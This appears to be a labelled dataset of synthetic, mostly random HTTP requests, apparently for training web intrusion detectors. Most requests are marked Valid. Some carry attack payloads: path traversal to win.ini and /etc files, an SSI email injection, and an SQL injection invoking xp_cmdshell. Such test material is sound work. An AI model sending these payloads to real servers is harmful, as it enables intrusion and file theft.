GET /tJt/lXMXadmin6passwdTsqL/ew0JK@.WtQ5GnnBxng/eHL/mGpasswdBkM2OHrm/esdytt6yt/7etenl9ux1inroieor/wWdcmR7rsfeenal/mRs@pHTXR233fkG/tai/bqCZPSy2SMG/egalSpinl.css?b9qxj@b5=ldybq69tm1yxo6kyvn HTTP/1.0
Host: www.roXofehtvf.com
Connection: suoa
Accept: text/xml;q=0.4
Accept-Charset: x-mac-cyrillic
Accept-Encoding: identity, compress;q=0.8
Accept-Language: std-e0I;q=0.8, dtist-etef3e;q=0.5, tslegk-urhs, e5fceee-p;q=0.9
Cache-Control: itss='fwoin6ef'
Client-ip: 130.227.3.39
Cookie: sisvi9Uape5=rZX-dmnOV9;9cyae=oXwdmseitahosclZy;I6flike=ibAlnm4rLS;ga=i@etsock_stream
Cookie2: $Version="5"
Date: Sat, 16 Jun 07 08:23:28 GMT
ETag: W/"ERAXGjzgXLEKLnGXtoz"
Expect: 100-continue
From: lienea@fkubr8mmw0.cz
If-Modified-Since: Mon, 10 Apr 06 16:19:53 CET
If-Unmodified-Since: Fri, 23 Jan 09 12:55:10 GMT
If-Match: *
If-None-Match: *
If-Range: "wE1aIL9NYv4mR6pR"
Max-Forwards: 50
MIME-Version: 6.8
Pragma: b='ce4Tt'
Proxy-Authorization: Basic ZWVuZGhlMzp5bXVzZw==
Authorization: vdox nkhym7i=nothy5
Range: 041-17,27-2488,01-
Referer: /kiis1.js
TE: deflate;q=0.4,gzip,trailers
Trailer: TE
User-Agent: n5c3yR http://www.ynsoSeat.de
UA-CPU: PowerPC
UA-Disp: 942,3967,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2627x335
Via: 8.2 www.sf7at.css:7, 2.1 www.vqWtIO.tiff, 2.5 0.60.32.88
Transfer-Encoding: compress
Upgrade: uietn/2.4
Warning: 512 13.143.191.178:1 "gLnswk" 
X-Forwarded-For: 109.176.189.188
X-Serial-Number: 72395720
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10573
Start - Id: 46195
class: PathTransversal
GET /tkJWWl0qBMNpqaAUAcL/a7V/wd.cfm?stiaPrgianv=va&ilshneHseeh5=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fq1y.conf&ncsa6lep7uuaso=7onwdiv&87Kmfoptmmtaee=80&rdsrqahmvtor=nvxccefNvFvar%2Bscn&otidnomc4ooeAh=edebtlb&rnt2aEuwc1ierTe=899&NHub=zocaT&rLexGC=7co9s7e&yEDen6=iXeb5lib%3EsSem&lFeDihj=0584455214 HTTP/1.1
Host: 134.28.87.126
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-arabic;q=0.1, euc-cn, isiri-3342, utf-7
Accept-Encoding: 
Accept-Language: *
Cache-Control: oSs=a
Client-ip: 151.9.229.102
Cookie: h00iclCIy=l7esnpziqr;nuEen5=14658;knghtq=dnmetaIdsk=qecapi0;YRlR=wTm;rfenpne=1;n0hlramrrn=qf@fkPp5Rp5
Cookie2: $Version="060"
Date: Mon, 23 Aug 04 20:12:43 GMT
ETag: "gKxZOaLRu1jDtbWY"
Expect: iRelgetf
From: sloo@sd406oko.ch
If-Modified-Since: Thu, 31 Jul 08 08:55:47 GMT
If-Unmodified-Since: Thu, 05 Jan 06 02:02:23 CET
If-Match: "pv2eHXEXrNBXFRj1Szr"
If-None-Match: "pAIJovFFDyhvyYjl"
If-Range: "kMrRzj1VdIWejPY"
Max-Forwards: 097
MIME-Version: 2.5
Pragma: jba='f'
Proxy-Authorization: NTLM dXNoNGdodHRybzRucGtlTHJpbzBmaTVGaWhzYWhyaWFlYXE=
Authorization: Basic YjE3ZXRiNzpzd2R6bWVz
Range: 3-60707,6378-,-00133
Referer: http://www.dxeiu5em.st/dffj/carrD/aiesa.nsf
TE: trailers,trailers,chunked;q=0.8
Trailer: Accept-Language
User-Agent: Mozilla/1.2 (Windows; U; Win98 7.5; f3-xY; rv:6.9.7) Gecko/65555196
UA-CPU: MIPS
UA-Disp: 411,052,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 939x7286
Via: FTP/0.8 214.77.125.123:174, 6.5 www.hehdf.tiff:6177
Transfer-Encoding: compress
Upgrade: eesinn/1.0, mc0b/6.6, eaa9an/7.8, olCrho/0.4, dhbfna/5.5
Warning: 034 www.nkeyuho.html "s4csmi7rg" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 4158799
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46195
Start - Id: 13554
class: Valid
GET /npmhw/execlTh.bin?ipsoco=yDdgeiornsn56owie9&tsrlTs=9ortiounodaeeee2 HTTP/1.1
Host: www.oteiatO.biz
Connection: keep-alive
Accept: application/*, video/mpeg;q=0.3, application/*;q=0.1
Accept-Charset: iso-8859-5;q=0.0, iso-8859-6
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-cache
Client-ip: 82.35.59.17
Cookie: 7irne=70;Igozaiht=62984259;qsdwotyeoavsmm=2939;3u8p=St2onsuayvl;ouhstap=06;aitni0chtMep=jhcopy)y
Cookie2: $Version="91"
Date: Wed, 16 Feb 05 07:25:22 UTC
ETag: W/"gQhz8jE0KLxYqpu"
Expect: 100-continue
From: ntyteei@sees9at.be
If-Modified-Since: Sun, 10 Aug 08 12:00:16 GMT
If-Unmodified-Since: Sat, 16 Dec 06 08:57:05 GMT
If-Match: "EUaKijTWnNaUP1c"
If-None-Match: *
If-Range: Fri, 28 Dec 07 17:43:18 UTC
Max-Forwards: 83
MIME-Version: 9.1
Pragma: ijii8='yfd'
Proxy-Authorization: noxn uaenegsM=zmtlt
Authorization: Digest response="05aDdb32CcD93dcf828C40C2926cCd7C"
Range: 91-168
Referer: http://t2IEmtt.uk/yuritSh/iShsdnz/ngauWe/irgstmr.wav
TE: chunked,trailers,trailers
Trailer: TE
User-Agent: teutrrsz9Hlefr
UA-CPU: x86
UA-Disp: 8631,7824,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1988x830
Via: 8.6 88.216.29.90:97, aGwtj/7.0 www.i6sor.js:985
Transfer-Encoding: gzip
Upgrade: teu/6.7, dj3/9.0, entsiy/1.9
Warning: 043 146.69.29.103 "pLtaauntea6teETrue" 
X-Forwarded-For: 156.12.70.0
X-Serial-Number: 70032554284651
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13554
Start - Id: 22052
class: Valid
GET /otzy9ueuDofan/n3cisnt3oatea/%uGUR9Xpsk4V/6g70M689pEc_BnKfU/T_8SnSA0SOl8/Pwphp2VxhidUyRmv/saonYsq/isd/sPK6alD/3lnullOHBHf/3q-unionU4/e4modqxsrapot.exe?TYqvxp_R1wdy7=3375703&aQuRweWt=41488&Ssn=replacei%5Dho&4hEVXpshutdown=hevb.x HTTP/1.1
Host: www.h6ntai1eng.fr:80
Connection: mheoor
Accept: image/png, application/rtf
Accept-Charset: gb2312, euc-jp;q=0.5, koi8;q=0.9, x-mac-arabic;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=755
Client-ip: 22.64.125.205
Cookie: ruio=ireeshtvtott3;na=mio;o2=nigGstne
Cookie2: $Version="79"
Date: Mon, 13 Sep 04 02:23:11 UTC
ETag: "PRhB29SvGuHU61M9H"
Expect: Tthjlexc
From: rnoHSnss@agsartc.de
If-Modified-Since: Tue, 14 Sep 04 11:28:01 CET
If-Unmodified-Since: Fri, 31 Mar 06 20:56:31 CET
If-Match: *
If-None-Match: "f-j5tdxaav@Q4On"
If-Range: "@oaPbNKkKUP4kSwHSl"
Max-Forwards: 5
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM NmdkZURlYmZoZW90emdNdHpkcmVmN3NoaWhzeWlvdHJ0
Authorization: Digest username="etsaajs"
Range: 5-448267
Referer: http://ttnsr.uk/innOrr.mdb
TE: deflate;q=0.4,trailers
Trailer: Referer
User-Agent: woTYav- http://www.tgAahi.st
UA-CPU: x86
UA-Disp: 077,354,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 4071x1172
Via: 5.5 220.221.212.201, Gar/7.7 www.rilPtsEr.jpg, 6.0 5.43.151.162:74
Transfer-Encoding: identity
Upgrade: hmu/5.3, de3y/5.6, 5rte4a/4.2
Warning: 820 www.oltb.png "tnnhasdd3aaA2o" "Sun, 19 Jul 09 17:41:12 GMT"
X-Forwarded-For: 30.171.197.154
X-Serial-Number: 10148622161169
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22052
Start - Id: 18796
class: Valid
GET /dsL6YCbIARW/f6Eform1/ye2dhhneomsdOtd/glgR0aA6fMsFO/nk/am/otsOhouEallW/eairrwitr0a/h6tTvlr/l.eTWf8Bj/eepJ/mwindow.openzbFGhomej.css? HTTP/1.1
Host: www.uctr0osssx.be:259
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 201.90.192.76
Cookie: nxsrrnae=tsno4rie;VZHoS=28444
Cookie2: $Version="72"
Date: Sat, 22 Jan 05 20:59:20 GMT
ETag: "915NzLGEFb2FG7Ud@t"
Expect: 100-continue
From: nn9rr@wiueoi.biz
If-Modified-Since: Thu, 25 Nov 04 01:28:52 GMT
If-Unmodified-Since: Thu, 23 Nov 06 09:08:57 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2635
MIME-Version: 8.1
Pragma: t='weet6'
Proxy-Authorization: tnendI BbsfCEj=gydc
Authorization: Digest algorithm=MD5-sess
Range: -8,379-,90-
Referer: /ubab.png
TE: deflate;q=0.6,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.3 (Machintosh; U; PPC Mac OS X 3.0; t2-rs; rv:0.2.1) Gecko/03633720
UA-CPU: MIPS
UA-Disp: 983,4723,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 017x6703
Via: FTP/1.2 www.Ralh.js, 6.0 www.osglwt.tiff, 0.7 251.115.91.228
Transfer-Encoding: gzip
Upgrade: T21ri/2.9, nerlj/2.8, otr/7.9
Warning: 587 60.189.174.160 "eapBalire2l" "Mon, 19 Apr 04 02:48:51 UTC"
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 57174297786
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18796
Start - Id: 18505
class: Valid
GET /Aoenasddnrdsca1/ffirehsNoeasnodege.cfm?8SZ2inputGKUcopyOecho=fealhHrauid6p6eGh&abtehawrr0=tal&rcEeedtetue1e=5bt&Iatcedeinfmxeam=ndeNt1mnashpp8yciw&ist3meidzh=7&tUmLaWL.Fdconnect=o8nhEatutbaoOO5&0s=pisf%5Ctyud+&ss.usraR@19For=eentsktlpt2&eu6mth=fOUEgUEYYky&B49HRl_iic=192864&tkrosgNoa=efXFbWE0Jgk HTTP/1.1
Host: www.addsdn.net
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: utes-Sm4l;q=0.2, atj6ds-dhoDodr;q=0.0
Cache-Control: min-fresh=374
Client-ip: 74.49.148.141
Cookie: yhihUnh2ftn=nsY
Cookie2: $Version="94"
Date: Tue, 14 Jul 09 08:07:26 CET
ETag: W/"ZPYVnFfO-qRYtP4sw"
Expect: 100-continue
From: eocete@3mtoie.org
If-Modified-Since: Wed, 14 Jan 09 03:22:59 GMT
If-Unmodified-Since: Thu, 16 Dec 04 19:37:21 UTC
If-Match: "rJdeI.tMoW6QNVvGE"
If-None-Match: "gBlTknLK6Pns1dD"
If-Range: *
Max-Forwards: 796
MIME-Version: 4.1
Pragma: uod1lrsh='semzEb'
Proxy-Authorization: Digest cnonce="3jshnz"
Authorization: nsKeoH uddsSsie=mrl5oon
Range: 29051-71
Referer: /sssE96Ae/dREwwem.bin
TE: chunked;q=0.9,gzip,trailers
Trailer: If-Range
User-Agent: nSa0/0.8
UA-CPU: PowerPC
UA-Disp: 973,9699,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 376x4288
Via: 2.1 83.243.254.68
Transfer-Encoding: deflate
Upgrade: ryat/0.4, gavm/5.1, n8hana/0.1
Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 81.60.123.231
X-Serial-Number: 1163774766
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18505
Start - Id: 9640
class: Valid
GET /oWHl5j/tcrn1a/em2Jmp/8o/tkstqq.mspx?XPvWf8tmplocationwvxmlG=s4ol3etauvtce3nr&jaoai=cr&bdnHdaxOd=06244512&ab=l-ma2UZwtKAc HTTP/1.0
Host: www.hiHi9pa8.be
Connection: ategp
Accept: */*;q=0.6
Accept-Charset: hz-gb-2312, iso-8859-3;q=0.0, x-mac-roman;q=0.0
Accept-Encoding: identity;q=0.2, identity, identity;q=0.0, identity;q=0.6
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 104.66.35.71
Cookie: yfledOIarte4pr7=62507645;IWDDERPqUD-=aa09laemse<sdO;hOviiestblcoic=lteeehILa;vc0EeusnSiYrin=md;tNCaTlinkHG5=8
Cookie2: $Version="50"
Date: Wed, 02 Apr 08 10:53:53 CET
ETag: "gRLOTPIf@.eIT7AaDMX"
Expect: n66hah
From: ihbitrga@smetittmer.st
If-Modified-Since: Mon, 14 Jul 08 08:01:00 UTC
If-Unmodified-Since: Wed, 26 Apr 06 01:22:40 GMT
If-Match: "g11gVmn_FtDxF2ia.c"
If-None-Match: *
If-Range: Mon, 02 Aug 04 22:17:18 CET
Max-Forwards: 1868
MIME-Version: 7.5
Pragma: lvurt71='n0ta'
Proxy-Authorization: jyhe b0tkvyos=lioe3l1
Authorization: Basic aWZOaGlzc246Y2JkdA==
Range: 580-560
Referer: /eeesta.asmx
TE: trailers,trailers,deflate;q=0.3
Trailer: Host
User-Agent: Mozilla/1.8 (X11; U; Open BSD i386 4.9; se-sm; rv:9.4.3) Gecko/27469013
UA-CPU: PowerPC
UA-Disp: 0833,784,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 904x062
Via: FTP/9.3 www.yNsh0.js, 1.5 www.iroro6.html
Transfer-Encoding: gzip
Upgrade: sNh/6.5, ssodh/7.1, jrin/2.9, wHoee/3.7, reoo9/6.9
Warning: 349 180.160.218.155 "yeinlhnok" "Wed, 31 Oct 07 04:57:31 CET"
X-Forwarded-For: 48.192.127.27
X-Serial-Number: 04486
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9640
Start - Id: 45060
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.0
Host: 55.193.90.85
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: *
Accept-Language: rt-roet;q=0.4, ebeeinm-aqnod
Cache-Control: no-store
Client-ip: 4.109.212.12
Cookie: YmailPR5o1.wHIe=aD4ys%ieroptZ$e\ozms;mzre=38150;hi3bRn=42952258;elrw0jwtrohE=hzpKys
Cookie2: $Version="345"
Date: Mon, 07 Mar 05 21:49:03 UTC
ETag: W/"VI05iHgMeDWsSIG"
Expect: ewaf=sngi;Nedtm=ctaEaQif
From: a5eiztho@ausccrtksa.uk
If-Modified-Since: Tue, 27 Oct 09 24:15:08 UTC
If-Unmodified-Since: Thu, 23 Sep 04 06:17:32 UTC
If-Match: "rIGsar_3oCllg8h0ZHB"
If-None-Match: "dWyNCpykQYI2nbV3g"
If-Range: Sun, 09 Jan 05 05:47:04 CET
Max-Forwards: 52
Pragma: Tnhwh=ruoe
Proxy-Authorization: NTLM bHRoZXRvdG1yMmw5cm1lbnlvNDVsNWFhM3NkZHVveWlp
Authorization: Basic Z0FlY2ZJQTpqaWRvbWUz
Range: 09453-71450,00-30
Referer: http://oit7.it/elloeSr/lil5iI/eiec/sdhnt7t/rava.js
TE: trailers
Trailer: Host
User-Agent: aeyhfheEgijetiwcrx
UA-CPU: 68000
UA-Disp: 7777,3718,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 127x929
Via: FTP/3.0 www.es9o.html, 6.9 www.1fpntt.css, 3.8 82.93.61.138:2
Transfer-Encoding: gzip
Upgrade: sE8t/1.6, Nhe/7.5, xdp/3.6, iiAp/5.2, r0rr/5.2
Warning: 514 241.201.245.243 "Aasvtsf2rhfAiuhrred" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 098890669103739278
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45060
Start - Id: 39361
class: SSI
GET /i-niSWI2TIYc8jfh5/rI_iLvXjy4pkt6.sh?ni=%3C%21--%23email+fromhost%3D%22www.erxedu.com%22+tohost%3D%22mailbox.nls.com%22+message%3D%22akiCt+m5usma+Rlobtim+L4dDnr%22+fromaddress%3D%227eeife.com%22+toaddress%3D%22fwei.hd7sA.com%22+subject%3D%22i%22+sender%3D%22lls.com%22+replyto%3D%22wb2IehO.com%22+cc%3D%22elz%22+inreplyto%3D%22sI+XNu+toemO%22+id%3D%228snmail%22+--%3E&HYDVrz8Mobject=88131&5bieei0ikab=629550487&J0FxV1vmtzY=xek.7pB1LbsP HTTP/1.0
Host: 102.180.252.159
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 105.126.198.220
Cookie: 9nt=oo9eHatyr;ctsEaihlssrs=n lservicese;TdEKEFh.VWH=qlfd9-ae9uc;meeuotbsE2eem=e~sssock_streamer]xoupdateeziadminf;np=99380246;Mpyg=84671480
Cookie2: $Version="92"
Date: Tue, 30 Nov 04 08:54:09 GMT
ETag: "otK3._w2Ir0715BPHo"
Expect: tiprS
From: ztifisTh@itMb.uk
If-Modified-Since: Fri, 30 Oct 09 15:16:07 CET
If-Unmodified-Since: Sat, 11 Apr 09 05:19:17 GMT
If-Match: *
If-None-Match: "l5hwTGXkh7vltlvqs"
If-Range: *
Max-Forwards: 9
MIME-Version: 9.5
Pragma: ht=o
Proxy-Authorization: NTLM ZWFtb25kbXdsZm10ZWp0dG9Ub3NsZGlheHJhZWVoUDVyT3NtcDlwZWh0c2hIdHNl
Authorization: Digest uri=/hxhl.mdb
Range: 009-9597,-73,-30
Referer: /etlphVmu/I0edur.jpg
TE: chunked;q=0.7,gzip,deflate
Trailer: Referer
User-Agent: tzpiKQ http://www.oslt.biz
UA-CPU: 68000
UA-Disp: 3265,6315,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3889x5923
Via: 6.7 11.130.17.205:130
Transfer-Encoding: deflate
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 323 73.178.52.116:03197 "ltotAehablocoeeRgen" "Sun, 08 Feb 09 14:43:34 UTC"
X-Forwarded-For: 247.166.24.114
X-Serial-Number: 385637154
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39361
Start - Id: 23580
class: Valid
GET /ielidmherdraTitedr/iu/l6oSTqM/7IQ.php4?OU_plmo=oatiftag&ascoabs=aGUhlThT733&4ltxveehftyn=gtXSSXNJ_&aRh7eb8ndReD=zlocation&eebqEagtaEp2or=ewwjpeaorNEag&1x2iRw07metaSWall=xdssSI9miransehmm&5tec2Oeo5hrihiy=+RarkftpHiservt4tz9&aTEei=1782&j3ircr=taO HTTP/1.1
Host: 172.137.235.85:7
Connection: keep-alive
Accept: video/mpeg, video/quicktime;q=0.8, text/*;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: deflate, compress;q=0.1, compress;q=0.4, gzip;q=0.4
Accept-Language: t-h
Cache-Control: no-cache
Client-ip: 214.95.37.188
Cookie: lYrhpDNxnaatra=et 
Cookie2: $Version="95"
Date: Sat, 17 Jul 04 13:44:07 GMT
ETag: "WlphIMoksGEL5gbZ"
Expect: s9ns8l=nsTeNoH;eoddienm=1dshxerB
From: Aial5osa@Mysrie.uk
If-Modified-Since: Sun, 16 Aug 09 17:08:24 GMT
If-Unmodified-Since: Sat, 27 Sep 08 13:58:06 GMT
If-Match: "ddsfc9P2aKpMoOa9"
If-None-Match: "blvlyfEDgok231Efm2v"
If-Range: "X6j9Tq53by2BN7zz"
Max-Forwards: 972
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Basic ZTNpdHNFbnM6UmhobGNQMA==
Authorization: Basic eWk4MGNlOnRnb3c=
Range: 62145-4,-94,41-
Referer: http://www.9idaEyh1.ch/weAspe/Nfeveny4/neafi/tjneg.dll
TE: gzip;q=0.4,chunked;q=0.5
Trailer: User-Agent
User-Agent: Mozilla/6.4 (Windows; U; Win98 9.9; 5d-ct; rv:9.3.7) Gecko/91892785
UA-CPU: StrongARM
UA-Disp: 990,4504,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 9524x6181
Via: HTTP/0.9 www.7dNy.jpeg:4507, 3.6 www.degd1.js, 7.3 74.30.72.169:3
Transfer-Encoding: compress
Upgrade: rtK/6.9
Warning: 022 212.144.200.24 "EvTfnHTeyotNE6" 
X-Forwarded-For: 114.129.219.250
X-Serial-Number: 1009110184973666911
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23580
Start - Id: 7731
class: Valid
POST /I6phsgttsvn.htm? HTTP/1.1
Content-Length: 200
Content-Language: Gfiadr,hIs,msheemkl
Content-Encoding: compress
Content-Location: http://www.q5laod0g.com/oac8i/ntzih.pl
Content-MD5: dWVubGNFbmRzdGFhYTdtaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 02 Dec 04 13:47:10 CET
Last-Modified: Thu, 03 Jun 04 09:50:08 GMT
Host: www.ieetEnte3.net:80
Connection: eizwdte
Accept: */*
Accept-Charset: x-mac-arabic, euc-cn;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 50.182.15.254
Cookie: 07ei4NEsweer=%ir;ngeEe=426131;unenSfh=roowherenftf
Cookie2: $Version="5"
Date: Tue, 11 Dec 07 12:45:06 UTC
ETag: "c2mKD4d0c9MOSWGDj_"
Expect: bagnant2
From: eOtxoh@nrxadyfhr.it
If-Modified-Since: Sun, 08 Aug 04 14:03:43 UTC
If-Unmodified-Since: Thu, 31 Jul 08 16:20:52 GMT
If-Match: "z2nh.NJvyiGlfzs"
If-None-Match: "eRICX5xaScYluGu"
If-Range: Sat, 28 May 05 07:18:22 CET
Max-Forwards: 4
MIME-Version: 4.6
Pragma: scXo='tfnEmB'
Proxy-Authorization: Basic c2pvY0RoYzplbmR3ZWw5
Authorization: Digest opaque="pmzeri"
Range: 176685-
Referer: /meatarct/ssaEuwe/theojea/iUrxs3ln.css
TE: trailers,deflate
Trailer: Date
User-Agent: mfa4otrta5ok
UA-CPU: Sparc
UA-Disp: 0857,811,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 297x5012
Via: dso/3.7 www.hapIari.jpg, HTTP/2.7 41.118.175.174, 7.9 50.66.43.48:206
Transfer-Encoding: gzip
Upgrade: kimait/9.7
Warning: 480 196.122.77.17 "8mahoZAa56riutaIm" 
X-Forwarded-For: 49.121.77.5
X-Serial-Number: 575043034
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hkd5gsode=9672256&LFAk=mmssHswss9&-@-rrm9f=szm&hrm4boCnsUxkotd=591&hf1=406&nc6hyMet=i&mo6or=h5tpasswdX&I&lOmr=~y&tJdeufir=hN;ss&V4s5nkhoeh=9nipinsertexBr'nndivperl~a&eDiemn=10&demsenwoeom=nR

End - Id: 7731
Start - Id: 6130
class: Valid
PUT /e3drOjherghjburur8/o7pB_/e5NR1Gj/gslduta/fEESWRz/c-M8@2/n9htlIalaeUrSab/aqyrhRaksfeEylu.jpg? HTTP/1.1
Content-Length: 240
Content-Language: nsil0r,wn,nrm0
Content-Encoding: identity
Content-Location: /ecqeyfS0/Gvv8gir/RthoLm/asecfuab/zr8oh.jpg
Content-MD5: cnN0ZXRlbW9wMEFzZWNnZg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 01 Apr 04 19:07:42 GMT
Last-Modified: Thu, 15 Feb 07 01:51:23 GMT
Host: 151.183.12.136:0127
Connection: keep-alive
Accept: image/png
Accept-Charset: iso-8859-8-i, iso-2022-kr
Accept-Encoding: *
Accept-Language: slneAe-Ay
Cache-Control: no-store
Client-ip: 2.7.31.61
Cookie: rieart=nertidGoote;dSddOnhtto=kYgSBEqy8do;LkservicesA40ak=s37z3rnlinko@amo;infhX9irltlorej=kK.x4k@5;a1du4h=ehweeehnuhTE;J_2F6RV=:esTojw+rostdinip5h
Cookie2: $Version="901"
Date: Mon, 22 Nov 04 06:13:57 UTC
ETag: W/"_FBDSU67b-wSnH9-"
Expect: 100-continue
From: Etnnkns@tnee.fr
If-Modified-Since: Fri, 05 Nov 04 23:58:43 GMT
If-Unmodified-Since: Wed, 18 Apr 07 05:21:08 GMT
If-Match: *
If-None-Match: "OALIR4HglQOnc@@"
If-Range: Sat, 28 Feb 09 22:47:08 CET
Max-Forwards: 8936
MIME-Version: 2.7
Pragma: u61rB='vIsew'
Proxy-Authorization: Digest algorithm=cedo
Authorization: sasap heea=Vreahc3
Range: -340133,256518-,-55124
Referer: http://ay0QDe.uk/e0st8a.bin
TE: trailers,deflate,chunked;q=0.3
Trailer: Via
User-Agent: ohkoeh2urt/2.5.8.7.0
UA-CPU: StrongARM
UA-Disp: 8680,157,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7265x3057
Via: Neqreu/1.2 31.96.129.45
Transfer-Encoding: gzip
Upgrade: hUaed/9.4, n1r/4.5, n0p/2.3
Warning: 335 www.isiR.js "eyuxr" 
X-Forwarded-For: 150.210.233.126
X-Serial-Number: 9298253900687
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

asw=3SwLeoieh42atspogw&UfkZzqX=53107977&wR4D=tyTijrh&Turedtu9oeco=03&92etmv0vefb=44 s:i&5M9yMstyleQAexeczbn=accept&6&0lcIhrthhrgyup=aeM&El3upqeipmN6=sIin&9rihHni6etpe=iareplacey&QRCFYcS8lR=eTnnnemi0testyle&jn0tert3aietar=006&gia=sealliK

End - Id: 6130
Start - Id: 1364
class: Valid
GET /iIcT/lp@S7Pf/j9vRZAYfS5BF-E2kDOyZ/Hconnectz38KRM/eXdlxjiQ/ncugredntaprefgat9/sh5md_cHXcL-/SKBiVpe8FjFn/jgMOhHIs.html?efd=onht&ljemf0z=i+gp&liDuezsaeqAm6d0=n&OV=alr+re&ponayottfv=%5Dj1&carcaa=z+form&0aai=txtGreaeTn2dAtdnj&6niritersye=tbay2%27lbO%25p%24 HTTP/1.0
Host: 116.137.193.192:80
Connection: l4ttu
Accept: application/*;q=0.8, audio/*;q=0.8, audio/basic;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: mEw-AgRL
Cache-Control: e='2hn5iiP3'
Client-ip: 202.244.73.172
Cookie: kyC9FautoexecY=566724611
Cookie2: $Version="4"
Date: Tue, 26 Jan 10 17:18:26 GMT
ETag: W/"._wYbaZ@hP6PUQ_."
Expect: rrdovts=scdge;aei1
From: wi2twwpe@rrmwot4.ch
If-Modified-Since: Sun, 26 Dec 04 17:09:44 UTC
If-Unmodified-Since: Thu, 06 Sep 07 04:31:14 UTC
If-Match: "WdY2VF4bKHjf.JSs_"
If-None-Match: *
If-Range: *
Max-Forwards: 6202
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM ZWhnckVyenJ0ZWlvc2loRm82dHF0d0thaGRvVmxwYTFvZjJ4ZWxvZHVOaWc2aA==
Authorization: emmDIe t0nmlL=fotR
Range: 24-
Referer: /aulw.ace
TE: deflate,chunked;q=0.5
Trailer: If-Modified-Since
User-Agent: yzsekxrr/8.1.7
UA-CPU: Sparc
UA-Disp: 0720,076,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 956x464
Via: 2.6 126.167.132.165, en4eW/4.2 www.so9tEoda.png, HTTP/3.7 www.idrTdHrd.tiff:713
Transfer-Encoding: deflate
Upgrade: Iifh/3.1, atthe/8.5
Warning: 116 www.asamee.tiff "9bnoTstath5hoeh" 
X-Forwarded-For: 188.179.244.100
X-Serial-Number: 814700
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1364
Start - Id: 41096
class: SqlInjection
GET /atImeie/cntvsj5aulee6emiahr/nfioctAhegh4viamt/_qNFBZt/ih563e/sYoewInasrt9uswnnaea/rapXa6aczi8dofedha1p/rAs5iframelogsbWBwj/twEpIz.sh?-ACcAa6pK=28606&dsaPa0oae0oeh=H4texknthip&U2f=243605&ocoEfl5gnue=1403&Suti3dn=exec+xp_cmdshell++%27%22ang%22+++++%3E%3E+++script.vbs%27&gVbsev@pKOG=60&jeadtehrceg5=62696828&e8uEtrrMeSfspia=saeneYrgtyo1ex2ysu&mguwrairEeLag=0621497&ogga=tfexecioau3%28ipdnandinscript&xD@1cPtmpiMfGK=hDd+ro+d%7Creoic&e3Dtr=nA0lN HTTP/1.1
Host: 197.232.15.201
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=82
Client-ip: 173.76.68.167
